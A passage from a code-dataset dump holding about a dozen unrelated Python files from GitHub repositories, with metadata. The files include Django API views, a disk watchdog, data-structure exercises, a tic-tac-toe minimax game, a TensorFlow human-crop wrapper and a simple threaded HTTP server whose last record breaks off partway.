[permissions.IsAuthenticated]\n\n def post(self, request, format=None, *args, **kwargs):\n q = PublicService.objects.all()\n keyword = self.request.GET.get(\"keyword\", \"\")\n website = self.request.GET.get(\"website\", \"\")\n\n dict_rdf_filters = request.data[\"rdfFilters\"]\n logger.info(\"dict_rdf_filters: %s\", dict_rdf_filters)\n\n # rdf_results = get_public_services(RDF_FUSEKI_URL)\n # rdf_uris = [str(item[\"uri\"]) for item in rdf_results]\n\n rdf_uris = get_public_service_uris_filter(\n filter_concepts=dict_rdf_filters.get(URI_IS_CLASSIFIED_BY),\n filter_public_organization=dict_rdf_filters.get(URI_HAS_COMPETENT_AUTHORITY),\n filter_contact_point=dict_rdf_filters.get(URI_HAS_CONTACT_POINT),\n )\n logger.info(\"rdf_uris: %s\", rdf_uris)\n\n if rdf_uris:\n q = q.filter(identifier__in=rdf_uris)\n if keyword:\n q = q.filter(name__icontains=keyword)\n if website:\n q = q.filter(website__name__iexact=website)\n\n else:\n q = PublicService.objects.none()\n\n page = self.paginate_queryset(q)\n\n serializer = self.get_paginated_response(\n self.serializer_class(page, many=True, context={\"request\": request}).data\n )\n\n return Response(serializer.data)\n\n\nclass PublicServiceDetailAPIView(RetrieveUpdateDestroyAPIView):\n queryset = PublicService.objects.all()\n serializer_class = PublicServiceSerializer\n\n\nclass ContactPointDetailAPIView(RetrieveUpdateDestroyAPIView):\n queryset = ContactPoint.objects.all()\n serializer_class = ContactPointSerializer\n\n\nclass EntityOptionsAPIView(APIView, abc.ABC):\n queryset = PublicService.objects.none()\n permission_classes = [permissions.IsAuthenticated]\n\n def get(self, request, format=None):\n mock_data = self.get_mock_data()\n\n return Response(mock_data)\n\n @staticmethod\n @abc.abstractmethod\n def get_mock_data():\n pass\n\n\nclass PublicServicesEntityOptionsAPIView(EntityOptionsAPIView):\n @staticmethod\n def get_mock_data():\n mock_data = [\n URI_HAS_CONTACT_POINT,\n URI_HAS_COMPETENT_AUTHORITY,\n URI_IS_CLASSIFIED_BY,\n \"http://cefat4cities.com/public_services/hasBusinessEvent\",\n \"http://cefat4cities.com/public_services/hasLifeEvent\",\n ]\n\n return mock_data\n\n\nclass ContactPointsEntityOptionsAPIView(EntityOptionsAPIView):\n @staticmethod\n def get_mock_data():\n mock_data = [\n URI_HAS_CONTACT_POINT,\n ]\n\n return mock_data\n\n\nclass DropdownOptionsAPIView(APIView, abc.ABC):\n queryset = PublicService.objects.none()\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None, *args, **kwargs):\n uri_type_has = request.data[\"uri_type\"]\n keyword = request.data[\"keyword\"]\n dict_rdf_filters = request.data[\"rdfFilters\"]\n\n values = self.get_values(uri_type_has)\n\n return Response(values)\n\n @staticmethod\n @abc.abstractmethod\n def get_values(uri_type_has):\n pass\n\n\nclass DropdownOptionsPublicServicesAPIView(DropdownOptionsAPIView):\n @staticmethod\n def get_values(uri_type_has):\n values = get_dropdown_options_for_public_services(uri_type_has)\n return values\n\n\nclass DropdownOptionsContactPointsAPIView(DropdownOptionsAPIView):\n @staticmethod\n def get_values(uri_type_has):\n values = get_dropdown_options_for_contact_points(uri_type_has)\n return values\n\n\nclass FusekiDatasetAPIView(APIView):\n queryset = PublicService.objects.none()\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None):\n\n req_data = {\"query\": request.data[\"query\"]}\n\n r = requests.post(RDF_FUSEKI_URL, data=req_data)\n return 
Response(r.content)\n","repo_name":"CrossLangNV/C4C_web_app","sub_path":"django/cpsv/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"23342814904","text":"import sys\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.figure()\r\n\r\nnameslist = [\"DNS_Re500_255.csv\", \"iLES_Re500_255_nonBDIM.csv\", \"test.csv\", \"iLES_Re500_255.csv\", \"filtDNS_Re500_255.csv\"]\r\n\r\nfor arg in nameslist:\r\n data = pd.read_csv(\"1D BDIM Burgers'/\"+arg, header=None)\r\n print(data)\r\n plt.plot(data.iloc[:,0], data.iloc[:,1], label=arg[:-4])\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n","repo_name":"J-Leetch/MSc-Project","sub_path":"1D BDIM Burgers'/plot_profiles.py","file_name":"plot_profiles.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"34150858300","text":"import sys \ninput = sys.stdin.readline\nN, C = map(int, input().split())\nlocations = [int(input()) for _ in range(N)]\nlocations.sort()\n\nstart = 1\nend = locations[-1] - locations[0]\nbest = 0\nwhile start <= end:\n mid = (start + end) // 2\n next_elem = 0\n cnt = 0\n for loc in locations:\n if loc >= next_elem:\n next_elem = loc + mid\n cnt += 1\n \n if cnt >= C:\n start = mid + 1\n best = mid\n else:\n end = mid - 1\n\nprint(best)\n\n","repo_name":"Roha-Lee/Algorithm-Study","sub_path":"BOJ/Traverse/2110.py","file_name":"2110.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"73006834684","text":"import os\nimport time\nfrom pathlib import Path\nfrom urllib.parse import quote\n\nimport watchdog.events\nimport watchdog.observers\nfrom isardvdi_common.api_rest import ApiRest\n\nfrom api import app\n\n\ndef _get_path_kind(directory):\n if \"/templates/\" in directory:\n kind = \"domains\"\n if \"/groups/\" in directory:\n kind = \"domains\"\n if \"/media/\" in directory:\n kind = \"media\"\n return kind\n\n\nclass Handler(watchdog.events.PatternMatchingEventHandler):\n def __init__(self):\n flavour = os.environ.get(\"FLAVOUR\", False)\n if str(flavour) == \"all-in-one\" or not flavour:\n self.hostname = \"isard-hypervisor\"\n else:\n self.hostname = os.environ.get(\"DOMAIN\")\n api_domain = os.environ.get(\"API_DOMAIN\", False)\n if api_domain and api_domain != \"isard-api\":\n self.api_rest = ApiRest(\"isard-api\")\n\n self.templates_path = \"/isard/templates\"\n self.desktops_path = \"/isard/groups\"\n self.media_path = \"/isard/media\"\n\n self.update_disks()\n watchdog.events.PatternMatchingEventHandler.__init__(\n self,\n patterns=[\"*.qcow2\", \"*.iso\"],\n ignore_directories=True,\n case_sensitive=False,\n )\n\n def update_disks(self):\n self.template_files = [\n {\n \"id\": str(p),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": \"template\",\n \"size\": p.stat().st_size,\n }\n for p in Path(self.templates_path).rglob(\"*\")\n if p.is_file()\n ]\n self.desktop_files = [\n {\n \"id\": str(p),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": \"desktop\",\n \"size\": p.stat().st_size,\n }\n for p in Path(self.desktops_path).rglob(\"*\")\n if p.is_file()\n ]\n self.api_rest.put(\n \"/storage/physical/init/domains\",\n self.template_files + self.desktop_files,\n )\n self.media_files = [\n {\n \"id\": str(hash(p.stat())),\n \"path\": str(p),\n \"hyper\": 
self.hostname,\n \"kind\": \"media\",\n \"size\": p.stat().st_size,\n }\n for p in Path(self.media_path).rglob(\"*\")\n if p.is_file()\n ]\n self.api_rest.put(\n \"/storage/physical/init/media\",\n self.media_files,\n )\n app.logger.info(\"- updated disks to api\")\n\n def on_created(self, event):\n app.logger.info(\"- received created event - % s.\" % event.src_path)\n p = Path(event.src_path)\n kind = _get_path_kind(event.src_path)\n self.api_rest.put(\n \"/storage/physical/\" + kind,\n {\n \"id\": str(p),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": kind,\n \"size\": p.stat().st_size,\n },\n )\n\n def on_deleted(self, event):\n app.logger.info(\"- received delete event - % s.\" % event.src_path)\n p = Path(event.src_path)\n kind = _get_path_kind(event.src_path)\n self.api_rest.delete(\"/storage/physical/\" + kind + \"/{}\".format(quote(str(p))))\n\n def on_moved(self, event):\n app.logger.info(\"- received moved event - % s.\" % event.src_path)\n # Event is moved, you can process it now\n\n\ndef start_disks_watchdog():\n src_path = r\"/isard\"\n event_handler = Handler()\n observer = watchdog.observers.Observer()\n observer.schedule(event_handler, path=src_path, recursive=True)\n observer.start()\n app.logger.info(\"- started disks watchdog\")\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"isard-vdi/isard","sub_path":"docker/storage/api.old/api/libv2/api_disks_watchdog.py","file_name":"api_disks_watchdog.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"41"} +{"seq_id":"19302660857","text":"class SingleNode:\n def __init__(self, elem):\n self.elem = elem\n self.next = None\n\n\nclass SimpleLinkedList:\n \"\"\"\n 单向链表\n \"\"\"\n\n def __init__(self, node=None):\n \"\"\"\n :param node:默认是空链表\n \"\"\"\n self.__head = node\n\n def is_empty(self):\n \"\"\"\n 判断是否为空\n :return:\n \"\"\"\n return self.__head is None\n\n def length(self):\n \"\"\"\n 链表的长度\n :return:count\n \"\"\"\n # 如果是空链表直接就返回count=0\n cur = self.__head\n count = 0\n while cur is not None:\n count += 1\n cur = cur.next\n return count\n\n def travel(self):\n \"\"\"\n 遍历链表\n :return:\n \"\"\"\n cur = self.__head\n while cur is not None:\n print(cur.elem, end=' ')\n cur = cur.next\n\n def add(self, elem):\n \"\"\"\n 从链表的头部添加元素\n :param elem:\n :return:\n \"\"\"\n node = SingleNode(elem)\n \"\"\"\n # 下面也可以处理是空链表的情况\n if self.is_empty():\n self.__head = node\n node.next = self.__head\n \"\"\"\n node.next = self.__head\n self.__head = node\n\n def append(self, elem):\n \"\"\"\n 尾部添加元素\n :param elem:\n :return:\n \"\"\"\n node = SingleNode(elem)\n if self.is_empty():\n self.__head = node\n else:\n cur = self.__head\n while cur.next is not None:\n cur = cur.next\n cur.next = node\n\n def insert(self, pos, elem):\n node = SingleNode(elem)\n if pos <= 0:\n self.add(elem)\n return\n elif pos > self.length() - 1:\n self.append(elem)\n return\n pre = self.__head\n count = 0\n while count < pos - 1:\n pre = pre.next\n count += 1\n node.next = pre.next\n pre.next = node\n\n def search(self, elem):\n \"\"\"\n 查找元素\n :param self:\n :param elem:\n :return:\n \"\"\"\n # 也可以处理空链表的情况\n cur = self.__head\n while cur is not None:\n if cur.elem == elem:\n return True\n else:\n cur = cur.next\n return False\n\n def remove(self, elem):\n pre = None\n cur = self.__head\n # 适用于空节点和删除头节点\n while cur is not None:\n if cur.elem == elem:\n # 判断当前节点是否是头节点\n # 也可以解决链表中只有一个头节点\n if cur == 
self.__head:\n self.__head = self.__head.next\n # self.__head = cur.next\n else:\n # 也适用于删除尾部节点\n pre.next = cur.next\n break\n else:\n pre = cur\n cur = cur.next\n\n\nsll = SimpleLinkedList()\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('------在链表尾部添加节点------')\nsll.append(1)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nsll.append(2)\nsll.append(3)\nsll.append(4)\nsll.append(5)\nsll.append(6)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\nprint('\\n------在链表头部添加节点-----')\nsll.add(7)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\nprint('\\n------在指定位置插入节点-----')\nsll.insert(0, 8)\nsll.insert(2, 9)\nsll.insert(9, 10)\nsll.insert(10, 10)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\nprint('\\n------删除指定位置的元素,实现的效果类似列表的remove方法-----')\nsll.remove(7)\nsll.remove(1)\nsll.remove(10)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\n\"\"\"\n当前链表是否为空: True\n当前链表长度: 0\n------在链表尾部添加节点------\n当前链表是否为空: False\n当前链表长度: 1\n当前链表是否为空: False\n当前链表长度: 6\n遍历链表:1 2 3 4 5 6 \n------在链表头部添加节点-----\n当前链表是否为空: False\n当前��表长度: 7\n遍历链表:7 1 2 3 4 5 6 \n------在指定位置插入节点-----\n当前链表是否为空: False\n当前链表长度: 11\n遍历链表:8 7 9 1 2 3 4 5 6 10 10 \n------删除指定位置的元素,实现的效果类似列表的remove方法-----\n当前链表是否为空: False\n当前链表长度: 8\n遍历链表:8 9 2 3 4 5 6 10\n\"\"\"\n","repo_name":"ThanlonSmith/data-structure-python3","sub_path":"codes/链表的实现/单链表的实现.py","file_name":"单链表的实现.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"41"} +{"seq_id":"19080542082","text":"#----------\r\n# Devin Suy\r\n#----------\r\n\r\nfrom Game.Board import Board \r\nfrom Game.Player import Player\r\nfrom Algorithm.MiniMax import MiniMax\r\nfrom pathlib import Path\r\nimport pickle\r\nimport sys\r\n\r\nclass Game:\r\n def __init__(self):\r\n # Enumerate all possible 3 in a row positions\r\n self.win_positions = [[0,4,8], [2,4,6], [0,1,2], [3,4,5], [6,7,8], [0,3,6], [1,4,7], [2,5,8]]\r\n self.board = Board()\r\n self.human = Player()\r\n self.bot = Player(True) \r\n self.opening_move = True\r\n\r\n def reset_game(self):\r\n self.board.reset_board()\r\n self.human.reset_player()\r\n self.bot.reset_player()\r\n self.opening_move = True\r\n\r\n # Takes in a list of the symbols in each cell and \r\n # sets the game to this state\r\n # EX: board[0] corresponds to what symbol may be in the top left cell \"X\" or \"O\" or \" \"\r\n def import_board(self, board):\r\n self.reset_game()\r\n for cell_num, symbol in enumerate(board):\r\n if symbol == \" \":\r\n continue\r\n elif symbol == \"X\":\r\n player = self.human\r\n else:\r\n player = self.bot\r\n\r\n self.board.set_cell(cell_num, player)\r\n \r\n # print(\"Imported board\")\r\n # self.board.draw()\r\n # print(\"Human (X): \", self.human.placements)\r\n # print(\"Bot (O): \", self.bot.placements)\r\n # print(\"Avail: \", self.board.avail_cell_nums)\r\n # print(\"Placed: \", self.board.placed_cell_nums)\r\n \r\n\r\n def board_is_full(self):\r\n return len(self.board.placed_cell_nums) == 9\r\n\r\n def get_cell(self, cell_num):\r\n return self.board.get_cell(cell_num)\r\n\r\n def game_over(self, player):\r\n for win_position in self.win_positions:\r\n # The player has placed 3 pieces in a win position\r\n if set(win_position).issubset(player.placements):\r\n return 
True\r\n\r\n return False\r\n\r\n # Function only called to prompt human player\r\n def select_move(self):\r\n try:\r\n selected_cell = int(input(\"\\n Human player select your move: \"))\r\n if selected_cell < 0 or selected_cell > 8 or selected_cell in self.board.placed_cell_nums:\r\n raise ValueError()\r\n except ValueError:\r\n # Input validation\r\n while True:\r\n try:\r\n selected_cell = int(input(\" ERROR, please select a valid cell: \"))\r\n if selected_cell >= 0 and selected_cell < 9 and selected_cell in self.board.avail_cell_nums:\r\n break\r\n except:\r\n continue\r\n\r\n return selected_cell\r\n\r\n # Have the Human player select an available cell\r\n def make_move(self, player):\r\n selected_cell_num = self.select_move() \r\n self.board.set_cell(selected_cell_num, player)\r\n self.board.draw()\r\n print(\"\\n \", player.name, \"places an\", player.symbol, \"@ position\", selected_cell_num)\r\n\r\n # Load the appropiate pre-processed states corresponding\r\n # to the opening move\r\n if self.opening_move:\r\n print(\"\\nEvaluating . . .\")\r\n load_path = Path(\"saved_states\")\r\n in_file = open(load_path.joinpath(\"states_\" + str(selected_cell_num) + \".obj\"), \"rb\")\r\n self.loaded_states = pickle.load(in_file)\r\n self.mm = MiniMax(self.loaded_states)\r\n self.current_state = self.loaded_states[-1]\r\n self.opening_move = False\r\n \r\n # Locate the successor state that corresponds to the move\r\n # that the human player just made and set that to our current state\r\n else:\r\n for succesor_state in self.current_state.successors:\r\n if succesor_state.game_state.board.avail_cell_nums == self.board.avail_cell_nums:\r\n self.current_state = succesor_state\r\n break\r\n\r\n\r\n # Bot is always maximizer\r\n def bot_make_move(self):\r\n optimal_score = self.current_state.state_score\r\n optimal_state = None\r\n \r\n # Find the successor of our current state that is the optimal move\r\n for successor_state in self.current_state.successors:\r\n if successor_state.state_score == optimal_score:\r\n optimal_state = successor_state\r\n\r\n # Our most recently added cell_num between the optimal successor state and our\r\n # current state is the is the Set difference of the placed_cell_nums of the two\r\n cache_utilized = False\r\n selected_cell_num = (optimal_state.game_state.board.placed_cell_nums - self.current_state.game_state.board.placed_cell_nums).pop()\r\n if selected_cell_num in self.board.avail_cell_nums:\r\n self.current_state = successor_state # Update pointer\r\n break\r\n\r\n \r\n self.board.set_cell(selected_cell_num, self.bot)\r\n self.board.draw()\r\n print(\"\\n Predicted State Value: \", optimal_score)\r\n print(\" Bot places an O @ position\", selected_cell_num)\r\n\r\n\r\n def validate_input(self, upper_bound):\r\n try:\r\n menu_selection = int(input(\"Enter your selection: \")) \r\n if menu_selection < 1 or menu_selection > upper_bound:\r\n raise ValueError()\r\n except ValueError:\r\n while True:\r\n try:\r\n menu_selection = int(input(\" ERROR, please select a valid option: \"))\r\n if menu_selection > 0 and menu_selection <= upper_bound:\r\n break\r\n except:\r\n continue\r\n\r\n return menu_selection \r\n\r\n def play(self):\r\n print(\"Tic-Tac-Toe\\n-----------\")\r\n print(\" Welcome Human! 
You are player X\")\r\n self.board.draw_display_board()\r\n\r\n # Human player always makes opening move and is designated (X)\r\n human_turn = game_tied = True\r\n \r\n while not self.board_is_full():\r\n if human_turn:\r\n self.make_move(self.human)\r\n if self.game_over(self.human):\r\n game_tied = False\r\n print(\"\\nHuman Player Has Won!!\")\r\n break\r\n else:\r\n self.bot_make_move()\r\n if self.game_over(self.bot):\r\n game_tied = False\r\n print(\"\\nComputer Player Has Won!!\")\r\n break\r\n\r\n human_turn = not human_turn # Turn taking\r\n\r\n if game_tied:\r\n print(\"\\nHuman and Computer have tied!!\")\r\n\r\n # Menu system\r\n print(\"\\nGame Over\\n---------\")\r\n print(\" 1. Play Again\")\r\n print(\" 2. Exit\\n\")\r\n menu_selection = self.validate_input(2)\r\n\r\n if menu_selection == 1:\r\n print(\"\\nStarting New Game . . .\\n\")\r\n self.reset_game()\r\n self.play()\r\n else:\r\n print(\"\\nTerminating . . . Goodbye!\")\r\n\r\n \r\n\r\n\r\n \r\n\r\n","repo_name":"devinsuy/Tic-Tac-AI-Player","sub_path":"Game/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"74604172284","text":"from loggers.logger_base import *\n\n\nclass TXTLogger(BaseLogger):\n def __init__(self, log_path=\"\"):\n super().__init__()\n if log_path == \"\":\n t = datetime.now()\n t = t.strftime(\"%Y%m%d_%H%M%S\")\n self.log_path = f\"./logs/{t}.txt\"\n else:\n self.log_path = log_path\n\n t = self.log_path.split(\"/\")\n self.log_prefix = t[0] + \"/\" + t[1]\n if not os.path.exists(self.log_prefix):\n os.makedirs(self.log_prefix)\n\n # elements:\n # {role: info, content: [agent_info]},\n # {role: ..., content: ...},\n # {role: coverage, content: [coverage_plan]}\n # {role: stop, content: done | max stimuli number}\n # {role: reset}\n self.log: List[List[Dict[str, Union[str, dict]]]] = [[]]\n self.logged_index = 0 # log index for logging\n\n self.logged_dialog_index = 1 # dialog index for logging\n self.logged_msg_index = 0 # dialog index for logging\n self.logged_total_msg_cnt = 0 # dialog index for logging\n\n def save_log(self):\n with open(self.log_path, \"a+\") as f:\n while self.logged_index < len(self.log[-1]):\n rec = self.log[-1][self.logged_index]\n\n if rec[\"role\"] == \"info\":\n agent_info: Dict[str, str] = rec[\"content\"]\n for k, v in agent_info.items():\n f.write(f\"{k}: {v}\\n\")\n f.write(\"\\n\")\n\n elif rec[\"role\"] == \"coverage\":\n coverage: Dict[str, int] = rec[\"content\"]\n coverage_plan = {k: v for (k, v) in coverage.items() if v > 0}\n f.write(f\"Coverage rate: {len(coverage_plan)} / {len(coverage)}\\n\")\n f.write(f\"Coverage plan: {coverage_plan}\\n\\n\")\n\n elif rec[\"role\"] == \"stop\":\n f.write(f'Stop: {rec[\"content\"]}\\n\\n')\n\n elif rec[\"role\"] == \"reset\":\n f.write(\"\\n<<<<< RESET >>>>>\\n\\n\\n\")\n\n else:\n if rec[\"role\"] == \"user\":\n self.logged_msg_index += 1\n self.logged_total_msg_cnt += 1\n f.write(f\"Dialog index: {self.logged_dialog_index}\\n\")\n f.write(f\"Message index: {self.logged_msg_index}\\n\")\n f.write(f\"Total msg cnt: {self.logged_total_msg_cnt}\\n\")\n if rec[\"role\"] != \"system\":\n f.write(f'Token counts: {rec[\"token cnt\"]}\\n')\n f.write(f'Role: {rec[\"role\"]}\\n')\n f.write(f'Content: {rec[\"content\"]}\\n\\n')\n\n self.logged_index += 
1\n","repo_name":"ZixiBenZhang/ml4dv","sub_path":"loggers/logger_txt.py","file_name":"logger_txt.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32980191825","text":"from random import choice\r\n\r\n\r\ndef get_allowed(size, prev_queens, current_line):\r\n positions = [True] * size\r\n for i in range(size):\r\n if i in prev_queens:\r\n positions[i] = False\r\n continue\r\n for j in range(len(prev_queens)):\r\n if abs(i - prev_queens[j]) == current_line - j:\r\n positions[i] = False\r\n break\r\n return [i for i in range(len(positions)) if positions[i]]\r\n \r\n\r\n\r\ndef recurse(question_size, line=0, back=False):\r\n while line < question_size:\r\n if back: # The next line has no solution\r\n stack[line].remove(queen.pop()) # Recent cause no solution\r\n else: # New line\r\n stack[line] = get_allowed(question_size, queen, line)\r\n if stack[line]: # If current line has solution\r\n queen.append(choice(stack[line]))\r\n return recurse(question_size, line + 1)\r\n else: # If not\r\n return recurse(question_size, line - 1, back=True)\r\n return queen\r\n\r\n\r\ndef print_chestboard(board):\r\n for i in range(8):\r\n line = [' |_| '] * 8\r\n line[board[i]] = ' |Q| '\r\n print(''.join(line)+'\\n')\r\n\r\n\r\nqueen = []\r\nstack = [[]] * 8\r\nrecurse(8)\r\nprint_chestboard(queen)\r\n","repo_name":"SE-starshippilot/CSC1001","sub_path":"Assignment 2/q2-6.py","file_name":"q2-6.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"41"} +{"seq_id":"23144179922","text":"n = int(input())\narr = [[0 for i in range(10)] for j in range(n)]\narr[0] = [0, 1, 1, 1, 1, 1, 1, 1, 1, 1]\nM = 1000000000\nfor i in range(1, n):\n temp = [0 for j in range(10)]\n temp[0] = arr[i - 1][1]\n temp[9] = arr[i - 1][8]\n for j in range(1, 9):\n temp[j] = (arr[i - 1][j - 1]%M + arr[i - 1][j + 1]%M)%M\n arr[i] = temp\n\nprint(sum(arr[n - 1])%M)","repo_name":"YunhoKim21/Algorithm","sub_path":"2022-01/dynamic programming/stairnum.py","file_name":"stairnum.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"18878057808","text":"import tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nclass MyModule(tf.Module):\n def __init__(self, model, **kwargs):\n super(MyModule, self).__init__(**kwargs)\n self.model = model\n\n @tf.function(input_signature=[tf.TensorSpec(shape=(1, None, None, 3), dtype=tf.uint8),\n tf.TensorSpec(shape=(1), dtype=tf.float32),\n tf.TensorSpec(shape=(2), dtype=tf.float32)])\n def update_signature(self, edet_input_image, det_thres, det_xy_change): # edet_input_image is the input name\n output = self.model(edet_input_image)\n det_boxes = output[0][0] # 100,4\n det_scores = output[1][0] # 100\n det_classes = output[2][0] # 100\n fil_det_boxes = tf.zeros([100, 4], dtype=tf.float32) # placeholder\n\n # postprocessing which is preprocessing for the next model in pipeline done here\n human_class_idx = tf.squeeze(tf.where(det_classes == 1.0), axis=1)\n\n # det_thres = 0.65\n # filter non human classes from det_scores and det boxes\n fil_det_scores = tf.gather(\n det_scores, human_class_idx, axis=0) # (None,)\n fil_det_boxes = tf.gather(\n det_boxes, human_class_idx, axis=0) # (None, 4,), y1, x1, y2, x2\n\n # filter low score human detections from bboxes, only take 3 boxes at max\n high_scores_idx = 
tf.squeeze(\n tf.where(fil_det_scores >= det_thres), axis=1) # (None,)\n fil_det_boxes = tf.gather(\n fil_det_boxes, high_scores_idx, axis=0)[:3] # (None, 4,)\n\n h = tf.shape(edet_input_image)[1]\n w = tf.shape(edet_input_image)[2]\n x_change = det_xy_change[0]\n y_change = det_xy_change[1]\n # increase the size of bounding boxes\n hf = tf.cast(h, dtype=tf.float32)\n wf = tf.cast(w, dtype=tf.float32)\n y1 = fil_det_boxes[:, 0] - y_change # (3, 1)\n y1 = tf.clip_by_value(y1, clip_value_min=0, clip_value_max=hf)\n x1 = fil_det_boxes[:, 1] - x_change # (3, 1)\n x1 = tf.clip_by_value(x1, clip_value_min=0, clip_value_max=wf)\n y2 = fil_det_boxes[:, 2] + y_change # (3, 1)\n y2 = tf.clip_by_value(y2, clip_value_min=0, clip_value_max=hf)\n x2 = fil_det_boxes[:, 3] + x_change # (3, 1)\n x2 = tf.clip_by_value(x2, clip_value_min=0, clip_value_max=wf)\n fil_det_boxes_expand = tf.stack([y1, x1, y2, x2], axis=1)\n\n # get a [h,w,h,w] tensor where h,w = orig image height,width\n edet_input_image_tensor = tf.cast([h, w, h, w], dtype=tf.float32)\n # normalize bbox coords to [0,1] by dividing by the orig image dimensions\n fil_det_boxes = fil_det_boxes_expand / edet_input_image_tensor\n\n edet_input_image = tf.cast(edet_input_image, dtype=tf.float32)\n edet_input_image /= 255.0 # normalize to range 0 to 1\n crop_size = (384, 288)\n batch_size = 1 # since we will be streaming images to this human det model\n box_indices = tf.random.uniform(shape=(len(fil_det_boxes),),\n minval=0,\n maxval=batch_size,\n dtype=tf.int32)\n human_crops = tf.image.crop_and_resize(edet_input_image,\n fil_det_boxes,\n box_indices,\n crop_size)\n\n def _human_det():\n return human_crops\n\n def _no_human_det():\n return tf.zeros([1, 384, 288, 3], dtype=tf.dtypes.float32)\n\n human_crops = tf.cond(\n tf.equal(tf.shape(human_crops)[0], 0), _no_human_det, _human_det)\n human_crops = tf.transpose(human_crops, perm=[0, 3, 1, 2])\n\n return {\"detection_boxes\": det_boxes,\n \"detection_scores\": det_scores,\n \"detection_classes\": det_classes,\n \"filtered_boxes\": fil_det_boxes,\n \"human_crops\": human_crops}\n\n\ndef main():\n model = tf.saved_model.load(\n \"../extra_models/edetlite4/1/model.savedmodel/\",\n tags=\"serve\")\n\n module = MyModule(model)\n save_path = \"edetlite4_modified_new/1/model.savedmodel\"\n os.makedirs(save_path, exist_ok=True)\n\n tf.saved_model.save(module,\n save_path,\n signatures={\"serving_default\": module.update_signature})\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SamSamhuns/human_body_proportion_estimation","sub_path":"models/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"29765520768","text":"\n\n\"\"\"\n完成httpserver的并发\n并发使用多线程完成\n用不同的后端程序处理不同的请求\n可以简单的显示静态页面\n\"\"\"\nimport sys\nfrom socket import *\nfrom threading import Thread\n#全局变量\nADDR=('0.0.0.0',8000)\n#存静态网页\nstatic_root=\"./static\"\n#存放python处理模块\nhanler_root=\"./hanler\"\n#httpserver 类\nclass HTTPServer(object):\n def __init__(self,addr):\n self.sockfd=socket()\n self.sockfd.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)\n self.sockfd.bind(addr)\n self.sockfd.listen(5)\n\n self.serveName=\"127.0.0.1\"\n self.servePort=8000\n #服务器启动函数:接受客户端请求,创建新的线程\n def serveForever(self):\n while True:\n self.connfd,self.clientAddr=self.sockfd.accept()\n clientThread=Thread(target=self.handleRequest)\n clientThread.start()\n\n def setApp(self,application):\n self.application=application\n\n def 
handleRequest(self):\n # 接收request请求\n self.recvData=self.connfd.recv(2048)\n requestHeaders=self.recvData.splitlines()\n for lien in requestHeaders:\n print(lien) \n #获取到从浏览器输入的具体请求\n getRequest=str(requestHeaders[0]).split(' ')[1]\n if getRequest[-3:] !=\".py\":\n if getRequest ==\"/\":\n getFilename=static_root+\"/index.html\"\n else:\n getFilename=static_root+getRequest\n try:\n f=open(getFilename)\n except:\n responseHeaders=\"HTTP/1.1 404 not find\\r\\n\"\n responseHeaders+=\"\\r\\n\"\n responseBody=\"========sorry,file not find=======\"\n else:\n responseHeaders=\"HTTP/1.1 200 OK\\r\\n\"\n responseHeaders+=\"\\r\\n\"\n responseBody=f.read()\n finally:\n response=responseHeaders+responseBody\n self.connfd.send(response.encode())\n else:\n #需要的环境变量\n env={}\n bodyContent=self.application(env,self.startResponse)\n response=\"HTTP/1.1 {}\\r\\n\".format(self.header_set[0])\n for header in self.header_set[1:]:\n response+=\"{0}:{1}\\r\\n\".format(*header)\n response+=\"\\r\\n\"\n response+=bodyContent\n self.connfd.send(response.encode())\n self.connfd.close()\n\n def startResponse(self,status,response_headlers):\n serverHeaders=[\n ('Date',\"2018-5-21\"),\n (\"Server\",\"HTTPServer 1.0\")\n ]\n self.header_set=[status,response_headlers+serverHeaders]\n#控制服务器启动\ndef main():\n #启动时 直接告知使用哪个模块那个函数处理请求\n #python3 HttpServer.python3 module app\n if len(sys.argv)<3:\n sys.exit(\"请选择一个模块和应用\")\n #将handler文件夹加入搜索路径\n sys.path.insert(0,hanler_root) \n #导入module模块 \n 